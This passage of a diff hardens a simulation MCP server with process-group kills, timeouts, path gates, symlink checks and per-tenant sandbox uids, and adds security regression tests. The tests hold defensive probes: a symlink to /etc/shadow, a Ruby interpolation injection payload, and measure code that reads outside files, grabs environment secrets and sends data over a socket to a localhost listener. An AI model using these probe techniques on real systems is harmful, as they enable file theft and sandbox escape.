LOG_TAIL_DEFAULT, @@ -24,10 +26,12 @@ MAX_CONCURRENCY_PER_USER, OSCLI_GEM_PATH, OSCLI_GEMFILE, + SIM_TIMEOUT_SECONDS, + is_path_allowed, user_run_root, ) from mcp_server.identity import user_key -from mcp_server.util import resolve_run_dir +from mcp_server.util import reject_escaping_symlinks, resolve_run_dir # Where the MCP server stores runs inside the container DEFAULT_LOG_TAIL = LOG_TAIL_DEFAULT @@ -251,6 +255,37 @@ def _pid_alive(pid: int) -> bool: return False +def _kill_process_group(pid: int, *, grace: float = 5.0) -> None: + """Terminate the run's whole process group (SIGTERM, then SIGKILL after grace). + + Sims launch with start_new_session=True, so the child is its own group leader + (pgid == pid); killing the group reaps forked children (EnergyPlus, ruby + helpers) that a single-pid kill would orphan. We only signal a group we created + (pgid == pid) — never the server's own group. Falls back to a single-pid kill + when the group can't be resolved or on non-POSIX (no os.killpg). + """ + pgid = None + if hasattr(os, "getpgid") and hasattr(os, "killpg"): + with contextlib.suppress(ProcessLookupError, PermissionError, OSError): + pgid = os.getpgid(pid) + if pgid is not None and pgid == pid: + with contextlib.suppress(ProcessLookupError, PermissionError, OSError): + os.killpg(pgid, signal.SIGTERM) + with contextlib.suppress(psutil.NoSuchProcess, psutil.TimeoutExpired): + psutil.Process(pid).wait(timeout=grace) + with contextlib.suppress(ProcessLookupError, PermissionError, OSError): + os.killpg(pgid, signal.SIGKILL) # ESRCH if the group already exited + return + # Fallback: pgid unavailable / not a leader / non-POSIX — single-pid kill. + with contextlib.suppress(psutil.NoSuchProcess, Exception): + p = psutil.Process(pid) + p.terminate() + try: + p.wait(timeout=grace) + except psutil.TimeoutExpired: + p.kill() + + def _build_run_cmd(osw_path: Path) -> list[str]: """openstudio CLI command to run a staged OSW (with bundle flags).""" return [ @@ -265,12 +300,21 @@ def _build_run_cmd(osw_path: Path) -> list[str]: def _launch(rec: RunRecord) -> None: """Start the EnergyPlus subprocess for a queued run. Caller holds _sim_lock.""" log = rec.run_dir / "openstudio.log" + # build_env creates run_dir/tmp (TMPDIR) as root; chown after so the dropped + # process owns it (order matters — see apply_measure). + run_env = sandbox.build_env(rec.run_dir) + sandbox.prepare_workdir(rec.run_dir) proc = subprocess.Popen( # noqa: S603 - cmd built from trusted config + staged OSW path - _build_run_cmd(rec.osw_path), + sandbox.wrap_cmd(_build_run_cmd(rec.osw_path), rec.run_dir), cwd=str(rec.run_dir), stdout=log.open("w", encoding="utf-8"), stderr=subprocess.STDOUT, - env=os.environ.copy(), + env=run_env, + # New session => the child is its own process-group leader (pgid == pid), + # so a timeout/cancel can kill the WHOLE group (EnergyPlus + any forked + # helpers) without ever signalling the server's own group. See + # _kill_process_group(). No-op on non-POSIX. + start_new_session=True, ) rec.pid = proc.pid rec.status = "running" @@ -318,8 +362,44 @@ def _dispatch_once() -> None: _queue.remove(run_id) +def _enforce_timeouts() -> None: + """Terminate running sims past the wall-clock cap and mark them failed. + + OSMCP_SIM_TIMEOUT_SECONDS=0 disables. The kill (terminate -> wait -> kill) + runs outside _sim_lock so a slow exit can't stall the dispatcher. + """ + if SIM_TIMEOUT_SECONDS <= 0: + return + now = _now() + with _sim_lock: + expired = [ + rec for rec in _RUNS.values() + if rec.status == "running" and rec.pid is not None + and rec.started_at is not None + and now - rec.started_at > SIM_TIMEOUT_SECONDS + # Skip a process that already exited but hasn't been reaped yet: let + # _dispatch_once()/_refresh_status() classify it by its real exit code + # instead of force-failing a run that may have completed successfully. + and _pid_alive(rec.pid) + ] + for rec in expired: + _kill_process_group(rec.pid) # whole group: EnergyPlus + any forked helpers + with _sim_lock: + rec.status = "failed" + rec.ended_at = _now() + rec.exit_code = -1 if rec.exit_code is None else rec.exit_code + rec.error = (f"Simulation exceeded the {SIM_TIMEOUT_SECONDS:.0f}s wall-clock " + "cap (OSMCP_SIM_TIMEOUT_SECONDS)") + _RUNS[rec.run_id] = rec + _persist_run_record(rec) + audit("sim_timeout", run_id=rec.run_id, user=rec.user_key, + ran_seconds=round(now - (rec.started_at or now), 1)) + + def _dispatch_loop() -> None: while True: + with contextlib.suppress(Exception): + _enforce_timeouts() with contextlib.suppress(Exception): _dispatch_once() time.sleep(0.5) @@ -340,7 +420,8 @@ def _enqueue(run_id: str) -> None: _queue.append(run_id) -def run_osw(osw_path: str, epw_path: str | None = None, name: str | None = None) -> dict[str, Any]: +def run_osw(osw_path: str, epw_path: str | None = None, name: str | None = None, + *, _internal: bool = False) -> dict[str, Any]: """ Stage the OSW + referenced files into /runs// and execute: openstudio run -w @@ -349,10 +430,28 @@ def run_osw(osw_path: str, epw_path: str | None = None, name: str | None = None) - We always validate the OSW JSON and its seed_file reference (if any). - If no EPW override is provided, we also require the OSW's weather_file (if set) to exist. - If an EPW override is provided, we allow a missing OSW weather_file because it will be replaced. + + Access control: as a PUBLIC tool, run_osw copies the OSW's whole parent dir into + the run dir — so an un-gated path discloses arbitrary host / other-tenant files. + Public callers must pass an OSW (and EPW) under their own run root or a shared + read root (is_path_allowed). `_internal=True` is the trusted path for + run_simulation, whose server-built temp OSW lives in a private staging dir and + whose inputs it has already validated; it is NOT exposed via the MCP tool. """ src_osw = Path(osw_path).resolve() if not src_osw.exists(): return {"ok": False, "error": f"OSW not found: {osw_path}"} + if not _internal: + # Gate BEFORE reading/validating/copying anything from the path. + if not is_path_allowed(src_osw): + return {"ok": False, "error": f"OSW path not allowed: {osw_path}"} + if epw_path and not is_path_allowed(Path(epw_path)): + return {"ok": False, "error": f"EPW path not allowed: {epw_path}"} + # We must never FOLLOW a symlink in the OSW's tree that escapes the bundle + # (would copy a host file into the run dir), even for the trusted internal path. + sym_err = reject_escaping_symlinks(src_osw.parent) + if sym_err: + return {"ok": False, "error": sym_err} # Fail fast on invalid OSW (before staging any run dir) v = validate_osw(str(src_osw), epw_path=epw_path) @@ -644,13 +743,15 @@ def cancel_run(run_id: str) -> dict[str, Any]: audit("sim_cancelled", run_id=run_id, user=rec.user_key) return {"ok": True, "run_id": run_id, "cancelled": True} + if not _pid_alive(pid): + # Finished before the cancel landed — classify by exit code, don't mislabel + # a completed run as cancelled. + with _sim_lock: + rec = _refresh_status(rec) + _RUNS[run_id] = rec + return {"ok": True, "run_id": run_id, "cancelled": False, "status": rec.status} try: - p = psutil.Process(pid) - p.terminate() - try: - p.wait(timeout=5) - except psutil.TimeoutExpired: - p.kill() + _kill_process_group(pid) # whole group (EnergyPlus + helpers), not just the leader with _sim_lock: rec.status = "cancelled" rec.ended_at = rec.ended_at or _now() @@ -658,11 +759,6 @@ def cancel_run(run_id: str) -> dict[str, Any]: _persist_run_record(rec) # disk record must read 'cancelled' so GC can reclaim it audit("sim_cancelled", run_id=run_id, user=rec.user_key) return {"ok": True, "run_id": run_id, "cancelled": True} - except psutil.NoSuchProcess: - with _sim_lock: - rec = _refresh_status(rec) - _RUNS[run_id] = rec - return {"ok": True, "run_id": run_id, "cancelled": False, "status": rec.status} except Exception as e: return {"ok": False, "run_id": run_id, "error": str(e)} @@ -744,6 +840,8 @@ def run_simulation(osm_path: str, epw_path: str | None = None, name: str | None osm = Path(osm_path) if not osm.exists(): return {"ok": False, "error": f"OSM file not found: {osm_path}"} + if not is_path_allowed(osm): + return {"ok": False, "error": f"OSM path not allowed: {osm_path}"} # Validate EPW path upfront if provided epw_abs: str | None = None @@ -751,6 +849,8 @@ def run_simulation(osm_path: str, epw_path: str | None = None, name: str | None epw = Path(epw_path) if not epw.exists(): return {"ok": False, "error": f"EPW file not found: {epw_path}"} + if not is_path_allowed(epw): + return {"ok": False, "error": f"EPW path not allowed: {epw_path}"} epw_abs = str(epw.resolve()) # Stage the minimal OSW in a throwaway temp dir. run_osw() copies the staged @@ -770,5 +870,7 @@ def run_simulation(osm_path: str, epw_path: str | None = None, name: str | None osw_path_out = stage / "workflow.osw" osw_path_out.write_text(json.dumps(osw, indent=2), encoding="utf-8") - # Delegate to run_osw — pass epw_path so it handles staging into files/ - return run_osw(osw_path=str(osw_path_out), epw_path=epw_abs, name=name) \ No newline at end of file + # Delegate to run_osw — pass epw_path so it handles staging into files/. + # _internal=True: osm + epw are already is_path_allowed above and the temp + # OSW is server-built in a private staging dir (not a caller-supplied path). + return run_osw(osw_path=str(osw_path_out), epw_path=epw_abs, name=name, _internal=True) \ No newline at end of file diff --git a/mcp_server/util.py b/mcp_server/util.py index 75ef54c..bbe9308 100644 --- a/mcp_server/util.py +++ b/mcp_server/util.py @@ -1,10 +1,82 @@ from __future__ import annotations import json +import os import shutil +import stat from pathlib import Path +def reject_escaping_symlinks(root: Path) -> str | None: + """Return an error string if the directory tree `root` contains a symlink + whose target resolves OUTSIDE `root`; else None. + + Used before staging untrusted measure/OSW trees: a link to a host file + (e.g. -> /etc/shadow) must not be copied or executed. Internal symlinks are + allowed. Does not follow symlinked directories (no traversal / loops). + """ + try: + rroot = str(root.resolve()) + except OSError: + return f"Cannot resolve path: {root}" + for dirpath, dirnames, filenames in os.walk(root, followlinks=False): + for name in dirnames + filenames: + p = Path(dirpath) / name + if not p.is_symlink(): + continue + try: + target = str(p.resolve()) + except OSError: + return f"Broken symlink in staged tree: {name}" + if target != rroot and not target.startswith(rroot + os.sep): + return f"Symlink escapes the allowed directory (not allowed): {name}" + return None + + +def read_file_bounded(path: Path, max_bytes: int) -> bytes: + """Read a regular file WITHOUT following a final-component symlink, capping + the read at ``max_bytes``. + + Hardening for copying back files produced by confined-but-untrusted code + (e.g. ``openstudio measure -u`` regenerating ``measure.xml`` in a staged + dir): + * O_NOFOLLOW (where available) closes the symlink-swap TOCTOU — a measure + that replaces the output with a link to e.g. /etc/shadow cannot redirect + the read to the link target. + * the read stops at ``max_bytes + 1``, so an oversized output cannot be + slurped wholesale into memory before being rejected. + + Raises ``ValueError`` on a symlink, a non-regular file (dir/fifo/device), an + oversize file, or an unreadable path. On platforms without O_NOFOLLOW the + symlink guard degrades to the caller's own is_symlink() check (the sandbox + targets Linux). + """ + flags = (os.O_RDONLY | getattr(os, "O_NOFOLLOW", 0) + | getattr(os, "O_NONBLOCK", 0) | getattr(os, "O_BINARY", 0)) + try: + fd = os.open(path, flags) + except OSError as e: + # ELOOP => final component is a symlink (O_NOFOLLOW); surface clearly. + raise ValueError(f"cannot read {path} (symlink or unreadable): {e}") from e + try: + if not stat.S_ISREG(os.fstat(fd).st_mode): + raise ValueError(f"not a regular file: {path}") + chunks: list[bytes] = [] + remaining = max_bytes + 1 + while remaining > 0: + chunk = os.read(fd, remaining) + if not chunk: + break + chunks.append(chunk) + remaining -= len(chunk) + data = b"".join(chunks) + if len(data) > max_bytes: + raise ValueError(f"file exceeds {max_bytes} bytes: {path}") + return data + finally: + os.close(fd) + + def safe_read_text(path: Path, max_bytes: int = 200_000) -> str: data = safe_read_bytes(path, max_bytes=max_bytes) return data.decode("utf-8", errors="replace") diff --git a/tests/test_measure_authoring.py b/tests/test_measure_authoring.py index b2606f7..70580bf 100644 --- a/tests/test_measure_authoring.py +++ b/tests/test_measure_authoring.py @@ -4,6 +4,7 @@ """ import asyncio import uuid +from pathlib import Path import pytest from conftest import integration_enabled, server_params, setup_example, unwrap @@ -203,6 +204,59 @@ async def _run(): asyncio.run(_run()) +@pytest.mark.integration +def test_xml_refresh_failure_preserves_passing_test_results(): + # Regression: a post-test metadata-refresh failure must NOT mask a passing + # (confined) test. The test drops an escaping symlink while confined; the + # post-test reject_escaping_symlinks guard then makes _update_measure_xml + # raise. Before this fix that raise propagated and test_measure returned + # ok:False, dropping passed/failed. Confinement — not the refresh's success — + # is the security boundary. + if not integration_enabled(): + pytest.skip("integration disabled") + + async def _run(): + async with stdio_client(server_params()) as (r, w): + async with ClientSession(r, w) as s: + await s.initialize() + create = unwrap(await s.call_tool("create_measure", { + "name": _unique("xml_refresh_warn"), + "description": "metadata refresh warning probe", + "run_body": ' runner.registerInfo("ok")', + "language": "Ruby", + })) + assert create["ok"] is True, create + measure_dir = Path(create["measure_dir"]) + # Replace the generated test with a PASSING one that, while running + # confined, plants an escaping symlink in the measure dir. The + # post-test reject_escaping_symlinks guard trips _update_measure_xml + # — deterministic, unlike `measure -u`'s (very tolerant) exit code. + test_files = sorted((measure_dir / "tests").glob("*_test.rb")) + assert len(test_files) == 1, test_files + test_files[0].write_text( + "require 'minitest/autorun'\n" + "class EscapeLinkTest < Minitest::Test\n" + " def test_drop_escaping_symlink\n" + " File.symlink('/etc/shadow', 'evil_escape_link') " + "unless File.symlink?('evil_escape_link')\n" + " assert(File.symlink?('evil_escape_link'))\n" + " end\n" + "end\n", + encoding="utf-8", + ) + return unwrap(await s.call_tool("test_measure", { + "measure_dir": str(measure_dir), + })) + + res = asyncio.run(_run()) + assert res["ok"] is True, f"passing test masked by xml-refresh failure: {res}" + assert res["passed"] > 0, res + assert "metadata_warning" in res, ( + f"expected non-fatal metadata_warning when refresh fails, got: {res}" + ) + assert "escape" in res["metadata_warning"].lower(), res["metadata_warning"] + + @pytest.mark.integration def test_test_measure_python_passes(): """Create a simple Python measure, run its tests.""" @@ -1148,3 +1202,58 @@ async def _run(): # Should still include measure_dir for debugging assert "measure_dir" in res asyncio.run(_run()) + + +@pytest.mark.integration +def test_ruby_description_interpolation_neutralized(): + # Regression: a measure description was emitted into a Ruby double-quoted + # literal WITHOUT escaping '#', so '#{...}' was live interpolation. When + # `openstudio measure -u` (run unsandboxed, as root) evaluated description(), + # the payload executed = RCE. _escape_ruby_str must escape '#' -> '\#'. + if not integration_enabled(): + pytest.skip("integration disabled") + from pathlib import Path + + payload = "harmless pwn#{2+2} tail" + + async def _run(): + async with stdio_client(server_params()) as (r, w): + async with ClientSession(r, w) as s: + await s.initialize() + name = _unique("rb_inject") + res = unwrap(await s.call_tool("create_measure", { + "name": name, + "description": payload, + "run_body": RUBY_BODY, + "language": "Ruby", + })) + assert res["ok"] is True, res + rb = Path(res["measure_dir"], "measure.rb").read_text(encoding="utf-8") + # The escaped form must be present and the live-interpolation form absent. + assert "pwn\\#{2+2}" in rb, f"description '#' not escaped:\n{rb}" + assert "pwn#{2+2}" not in rb, f"live Ruby interpolation survived:\n{rb}" + asyncio.run(_run()) + + +@pytest.mark.integration +def test_uppercase_arg_name_rejected(): + # Regression: an uppercase-leading arg name became a bare Ruby local `Foo = ...`, + # which Ruby parses as dynamic constant assignment (SyntaxError) inside a method, + # breaking the generated measure. _ARG_NAME_RE must reject uppercase-leading names. + if not integration_enabled(): + pytest.skip("integration disabled") + + async def _run(): + async with stdio_client(server_params()) as (r, w): + async with ClientSession(r, w) as s: + await s.initialize() + res = unwrap(await s.call_tool("create_measure", { + "name": _unique("up_arg"), + "description": "uppercase arg name", + "run_body": RUBY_BODY, + "language": "Ruby", + "arguments": [{"name": "BadName", "type": "String", "required": False}], + })) + assert res["ok"] is False, f"uppercase arg name must be rejected: {res}" + assert "argument name" in res.get("error", "").lower(), res + asyncio.run(_run()) diff --git a/tests/test_path_safety.py b/tests/test_path_safety.py index 32d6d2a..71cd926 100644 --- a/tests/test_path_safety.py +++ b/tests/test_path_safety.py @@ -5,12 +5,99 @@ from __future__ import annotations import json +import os import subprocess as _subprocess import pytest +from mcp_server.util import read_file_bounded + pytestmark = pytest.mark.unit + +class TestReadFileBounded: + """read_file_bounded — bounded, symlink-refusing copy-back read used after + confined `openstudio measure -u` regenerates measure.xml/README.md.""" + + def test_reads_within_bound(self, tmp_path): + # Validates: a normal generated file is returned verbatim. + f = tmp_path / "measure.xml" + f.write_bytes(b"" * 5) + assert read_file_bounded(f, 1000) == b"" * 5 + + def test_rejects_oversize(self, tmp_path): + # Regression: untrusted measure -u could write a giant measure.xml; the + # read is bounded (max_bytes+1) so it can't be slurped wholesale into + # the unconfined server's memory (Copilot C1). + f = tmp_path / "big.xml" + f.write_bytes(b"A" * 200) + with pytest.raises(ValueError, match="exceeds"): + read_file_bounded(f, 100) + + @pytest.mark.skipif(not hasattr(os, "O_NOFOLLOW"), reason="O_NOFOLLOW is POSIX-only") + def test_refuses_to_follow_symlink(self, tmp_path): + # Regression: measure -u (untrusted) could swap the output for a symlink + # to a host secret; O_NOFOLLOW means copy-back never reads the link + # target (TOCTOU). A naive read_bytes() would return the secret here. + secret = tmp_path / "secret" + secret.write_bytes(b"TOPSECRET") + link = tmp_path / "measure.xml" + link.symlink_to(secret) + with pytest.raises(ValueError, match="symlink"): + read_file_bounded(link, 1000) + + @pytest.mark.skipif(not hasattr(os, "O_NONBLOCK"), reason="POSIX fifo test") + def test_refuses_non_regular_file(self, tmp_path): + # Validates: a fifo/dir masquerading as a generated file is rejected + # (not a regular file) instead of blocking or reading junk. + d = tmp_path / "README.md" + d.mkdir() + with pytest.raises(ValueError, match="not a regular file"): + read_file_bounded(d, 1000) + + +class TestPerTenantSandboxUid: + """Per-tenant sandbox uid derivation (M1/M2). Each remote tenant gets its own + uid so RLIMIT_NPROC (per-uid) is a private budget and DAC isolates run dirs + even without Landlock; the local single user keeps the baked-in base uid.""" + + def test_local_keeps_base_uid(self, monkeypatch): + # Validates: stdio/off-request single user keeps the baked sandbox uid — + # preserves today's behavior, no per-tenant derivation. + import mcp_server.config as cfg + monkeypatch.setattr("mcp_server.identity.user_key", lambda: "local") + assert cfg.sandbox_ids() == (cfg.SANDBOX_UID, cfg.SANDBOX_GID) + + def test_distinct_uid_per_tenant(self, monkeypatch): + # Regression (M1/M2): all tenants shared uid 1001 -> one shared NPROC + # budget (cross-tenant fork-bomb DoS) and zero DAC isolation in the posix + # tier. Each tenant key must map to its OWN non-root uid. + import mcp_server.config as cfg + monkeypatch.setattr("mcp_server.identity.user_key", lambda: "alice") + a = cfg.sandbox_ids() + monkeypatch.setattr("mcp_server.identity.user_key", lambda: "bob") + b = cfg.sandbox_ids() + assert a != b, "distinct tenants must get distinct sandbox uids" + assert a[0] >= 2000 and b[0] >= 2000, "derived uids must be above the system/sandbox range" + assert a[0] != cfg.SANDBOX_UID, "a tenant uid must differ from the local base uid" + assert a[1] == a[0] and b[1] == b[0], "gid tracks uid" + + def test_uid_stable_for_same_key(self, monkeypatch): + # Validates: derivation is stable across calls (hashlib, not randomized + # hash()) so a request's chown and setuid agree on the same uid. + import mcp_server.config as cfg + monkeypatch.setattr("mcp_server.identity.user_key", lambda: "carol") + assert cfg.sandbox_ids() == cfg.sandbox_ids() + + def test_sandbox_uid_zero_clamped(self): + # Regression (Codex H5): OSMCP_SANDBOX_UID<=0 must clamp to a non-root uid + # so the local base uid can never be root (kept as a unit test now that the + # HTTP h5 path exercises per-tenant derivation instead of the base uid). + import mcp_server.config as cfg + assert cfg._safe_sandbox_id("0", 1001) == 1001 + assert cfg._safe_sandbox_id("-5", 1001) == 1001 + assert cfg._safe_sandbox_id("4242", 1001) == 4242 + # --------------------------------------------------------------------------- # C-1: seed_file path traversal guard in run_osw # --------------------------------------------------------------------------- @@ -72,7 +159,7 @@ def kill(self): monkeypatch.setattr(_subprocess, "Popen", _FakePopen) - result = run_osw(str(osw_path)) + result = run_osw(str(osw_path), _internal=True) # exercise staging/flatten, not the access gate # Staging happens before subprocess — verify unconditionally assert "escapes" not in result.get("error", ""), f"Path traversal error: {result}" run_dirs = list(run_root.iterdir()) @@ -122,7 +209,7 @@ def kill(self): monkeypatch.setattr(_subprocess, "Popen", _FakePopen) - result = run_osw(str(osw_path)) + result = run_osw(str(osw_path), _internal=True) # exercise staging/flatten, not the access gate # Staging happens before subprocess — verify unconditionally assert "escapes" not in result.get("error", ""), "Normal seed incorrectly rejected" run_dirs = list(run_root.iterdir()) @@ -461,3 +548,60 @@ def test_bad_end_month(self): result = set_run_period(begin_month=1, begin_day=1, end_month=13, end_day=31) assert result["ok"] is False assert "end_month" in result["error"] + + +class TestRunOswAccessControl: + """#2 (Codex): the PUBLIC run_osw must reject an OSW outside the caller's + allowed roots — it copies the OSW's whole parent dir into the run dir, so an + un-gated path is a cross-tenant / host file-disclosure vector.""" + + def _stub(self, monkeypatch, run_root): + monkeypatch.setattr( + "mcp_server.skills.simulation.operations.user_run_root", lambda: run_root) + monkeypatch.setattr( + "mcp_server.skills.simulation.operations._ensure_dispatcher", lambda: None) + + def test_out_of_policy_osw_rejected(self, tmp_path, monkeypatch): + # Regression: run_osw skipped is_path_allowed and _copy_tree'd the OSW's whole + # parent dir into the run dir, disclosing arbitrary host / other-tenant files. + outside = tmp_path / "other_tenant" + outside.mkdir() + (outside / "secret.osm").write_text("another tenant's model") + (outside / "workflow.osw").write_text(json.dumps({"seed_file": "secret.osm"})) + run_root = tmp_path / "runs" + run_root.mkdir() + self._stub(monkeypatch, run_root) + + from mcp_server.skills.simulation.operations import run_osw + result = run_osw(str(outside / "workflow.osw")) # public call (no _internal) + assert result["ok"] is False, f"out-of-policy OSW must be rejected: {result}" + assert "not allowed" in result.get("error", "").lower(), result + assert list(run_root.iterdir()) == [], "nothing may be staged from a rejected path" + + def test_internal_trusted_path_still_stages(self, tmp_path, monkeypatch): + # Validates: the internal staging path (run_simulation's server-built temp OSW) + # still works via _internal=True, even from a dir outside the allowed roots. + stage = tmp_path / "stage" + stage.mkdir() + (stage / "model.osm").write_text("seed") + (stage / "workflow.osw").write_text(json.dumps({"seed_file": "model.osm"})) + run_root = tmp_path / "runs" + run_root.mkdir() + self._stub(monkeypatch, run_root) + + class _FakePopen: + def __init__(self, *a, **kw): + self.returncode = 1 + self.pid = 999 + def poll(self): + return self.returncode + def wait(self, timeout=None): + return self.returncode + def kill(self): + pass + + monkeypatch.setattr(_subprocess, "Popen", _FakePopen) + from mcp_server.skills.simulation.operations import run_osw + result = run_osw(str(stage / "workflow.osw"), _internal=True) + assert "not allowed" not in result.get("error", "").lower(), result + assert len(list(run_root.iterdir())) == 1, f"internal staging should create a run dir: {result}" diff --git a/tests/test_sandbox.py b/tests/test_sandbox.py new file mode 100644 index 0000000..ca24297 --- /dev/null +++ b/tests/test_sandbox.py @@ -0,0 +1,975 @@ +"""Confirm the measure-exec vulnerabilities that the sandbox (planned) will close. + +Context: docs/plans/measure-exec-sandbox.md. Today an applied measure runs as +root, with the server's full environment, unconfined filesystem, and open +network — see skills/measures/operations.py (`env=os.environ.copy()`, no UID +drop, no FS policy). These tests PROVE each hole exists, safely, using canaries +and decoys only (no real secret/file/host is touched, nothing leaves the box). + +Design — "prove the problem exists now" half of the dual-run plan: + - Server is spawned with OSMCP_SANDBOX=off, so these document the explicit + passthrough/escape-hatch behaviour and remain valid once the sandbox lands + (off = full passthrough, by design — the Codex `danger-full-access` model). + - Each probe attempts an attack and reports via runner.registerInfo("PROBE ..."). + The AUTHORITATIVE check is external ground truth (escape file on disk, bytes + the listener received, the uid value), not just the measure's self-report. + +Fix increment 1 has landed (clean-env floor + unconditional measure_dir check): + - test_measure_exec_unconfined_today (OSMCP_SANDBOX=off) still proves all five + holes — off is a true passthrough by design. + - test_clean_env_blocks_secret_leak (OSMCP_SANDBOX=posix) proves the env-secret + leak is closed and a normal run still succeeds (allowlist complete enough). + - test_measure_dir_traversal_blocked proves arbitrary out-of-root measure paths + are rejected (check is unconditional, not gated by OSMCP_SANDBOX). +Fix increment 2 (UID drop + rlimits) and increment 3 (Landlock FS + seccomp +net-deny) have landed: + - test_posix_drops_root_and_applies_rlimits — per-tenant non-root uid, NPROC + rlimit, DAC blocks a root-owned write (OSMCP_SANDBOX=posix). + - test_full_tier_blocks_read_escape_and_network — Landlock blocks reading a + world-readable file outside the run dir, blocks writing outside it, and + seccomp blocks outbound IP networking (OSMCP_SANDBOX=auto), while the run + still succeeds. +With the full tier, all five holes are closed; off remains a true passthrough. + +Safety notes: + - Decoys live under RUN_ROOT / a tmpdir on the disposable runs volume and are + deleted in finally blocks. + - The network probe targets a localhost listener owned by this test process, + inside the same container — no traffic leaves the machine. +""" +import asyncio +import os +import re +import shutil +import socket +import subprocess +import sys +import tempfile +import textwrap +import threading +import uuid +from pathlib import Path + +import pytest +from conftest import ( + EPW_PATH, + http_server, + http_session, + integration_enabled, + setup_example, + unwrap, +) + +pytestmark = pytest.mark.integration + +RUN_ROOT = Path( + os.environ.get("OPENSTUDIO_MCP_RUN_ROOT", os.environ.get("OSMCP_RUN_ROOT", "/runs")), +) +_FIXTURE_MEASURE = Path(__file__).parent / "assets" / "measures" / "set_building_name" + +# Each probe attempts one attack and registers a "PROBE =" line. +# victim_path / escape_path / net_target are passed as measure arguments, so the +# same measure body exercises all five holes in a single `openstudio run`. +_RB_PROBE_BODY = """ +require 'socket' +runner.registerInfo("PROBE uid=#{Process.uid}") +runner.registerInfo("PROBE nproc=#{Process.getrlimit(:NPROC)[0]}") +runner.registerInfo("PROBE env=#{ENV['OSMCP_CANARY_SECRET'] || ''}") +begin + runner.registerInfo("PROBE read=#{File.read(victim_path).strip}") +rescue => e + runner.registerInfo("PROBE read_err=#{e.class}") +end +begin + File.write(escape_path, "ESCAPED") + runner.registerInfo("PROBE wrote=#{escape_path}") +rescue => e + runner.registerInfo("PROBE write_err=#{e.class}") +end +begin + host, port = net_target.split(":") + s = TCPSocket.new(host, port.to_i) + s.write("CANARY_EXFIL") + s.close + runner.registerInfo("PROBE net=sent") +rescue => e + runner.registerInfo("PROBE net_err=#{e.class}") +end +""" + +_PY_PROBE_BODY = """ +import os +import socket +import resource +runner.registerInfo("PROBE uid=%d" % os.getuid()) +runner.registerInfo("PROBE nproc=%d" % resource.getrlimit(resource.RLIMIT_NPROC)[0]) +runner.registerInfo("PROBE env=%s" % os.environ.get("OSMCP_CANARY_SECRET", "")) +try: + with open(victim_path) as f: + runner.registerInfo("PROBE read=%s" % f.read().strip()) +except Exception as e: + runner.registerInfo("PROBE read_err=%s" % type(e).__name__) +try: + with open(escape_path, "w") as f: + f.write("ESCAPED") + runner.registerInfo("PROBE wrote=%s" % escape_path) +except Exception as e: + runner.registerInfo("PROBE write_err=%s" % type(e).__name__) +try: + host, port = net_target.split(":") + s = socket.create_connection((host, int(port)), timeout=5) + s.sendall(b"CANARY_EXFIL") + s.close() + runner.registerInfo("PROBE net=sent") +except Exception as e: + runner.registerInfo("PROBE net_err=%s" % type(e).__name__) +""" + +_PROBE_ARGS = [ + {"name": "victim_path", "type": "String", "required": True, "default_value": ""}, + {"name": "escape_path", "type": "String", "required": True, "default_value": ""}, + {"name": "net_target", "type": "String", "required": True, "default_value": ""}, +] + + +def _unique(prefix: str = "pytest_sandbox") -> str: + return f"{prefix}_{uuid.uuid4().hex[:10]}" + + +def _probe_body(language: str) -> str: + """Indent the probe body to the base indent create_measure injects at.""" + if language == "Ruby": + return textwrap.indent(textwrap.dedent(_RB_PROBE_BODY).strip("\n"), " ") + return textwrap.indent(textwrap.dedent(_PY_PROBE_BODY).strip("\n"), " ") + + +class _CanaryListener: + """Localhost TCP listener that records the first payload it receives. + + Owned by the test process, bound to 127.0.0.1 inside the container — the + measure subprocess connects to it; nothing leaves the machine. + """ + + def __init__(self): + self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + self.sock.bind(("127.0.0.1", 0)) + self.sock.listen(1) + self.sock.settimeout(30) + self.port = self.sock.getsockname()[1] + self.received = b"" + self._thread = threading.Thread(target=self._serve, daemon=True) + + def start(self): + self._thread.start() + + def _serve(self): + try: + conn, _ = self.sock.accept() + with conn: + conn.settimeout(5) + self.received = conn.recv(1024) + except OSError: + pass + finally: + self.sock.close() + + def close(self): + try: + self.sock.close() + except OSError: + pass + + +@pytest.fixture(scope="module") +def sandbox_server(): + """One HTTP server for the module, with a fake canary secret in its env. + + OSMCP_SANDBOX=off pins the current unconfined passthrough so these stay valid + once the sandbox exists. The canary is a fake value — never a real credential. + """ + if not integration_enabled(): + pytest.skip("integration disabled") + canary = f"do-not-leak-{uuid.uuid4().hex[:8]}" + with http_server({ + "MCP_AUTH": "none", + "OSMCP_SANDBOX": "off", + "OSMCP_CANARY_SECRET": canary, + }) as (url, _proc): + yield url, canary + + +@pytest.fixture(scope="module") +def confined_server(): + """An HTTP server with the POSIX floor on (OSMCP_SANDBOX=posix).""" + if not integration_enabled(): + pytest.skip("integration disabled") + canary = f"do-not-leak-{uuid.uuid4().hex[:8]}" + with http_server({ + "MCP_AUTH": "none", + "OSMCP_SANDBOX": "posix", + "OSMCP_CANARY_SECRET": canary, + }) as (url, _proc): + yield url, canary + + +@pytest.fixture(scope="module") +def full_server(): + """An HTTP server with the full tier (OSMCP_SANDBOX=auto: posix + Landlock + seccomp).""" + if not integration_enabled(): + pytest.skip("integration disabled") + canary = f"do-not-leak-{uuid.uuid4().hex[:8]}" + with http_server({ + "MCP_AUTH": "none", + "OSMCP_SANDBOX": "auto", + "OSMCP_CANARY_SECRET": canary, + }) as (url, _proc): + yield url, canary + + +@pytest.fixture(scope="module") +def net_allow_server(): + """Full tier but with the network deny opted out (OSMCP_SANDBOX_NET=allow).""" + if not integration_enabled(): + pytest.skip("integration disabled") + with http_server({ + "MCP_AUTH": "none", + "OSMCP_SANDBOX": "auto", + "OSMCP_SANDBOX_NET": "allow", + }) as (url, _proc): + yield url + + +async def _create_probe_measure(session, language: str) -> str: + res = unwrap(await session.call_tool("create_measure", { + "name": _unique("sandbox_probe_" + ("rb" if language == "Ruby" else "py")), + "description": "Sandbox vulnerability probe (test fixture).", + "run_body": _probe_body(language), + "language": language, + "arguments": _PROBE_ARGS, + })) + assert res.get("ok") is True, f"create_measure failed: {res}" + return res["measure_dir"] + + +@pytest.mark.parametrize("language", ["Ruby", "Python"]) +def test_measure_exec_unconfined_today(language, sandbox_server): + # Validates: an applied measure today runs as root, sees the server's secret + # env, reads outside its run dir, writes outside its run dir, and opens the + # network — the five holes the sandbox must close. Proven safely via canaries. + url, canary = sandbox_server + tag = uuid.uuid4().hex[:8] + victim_secret = 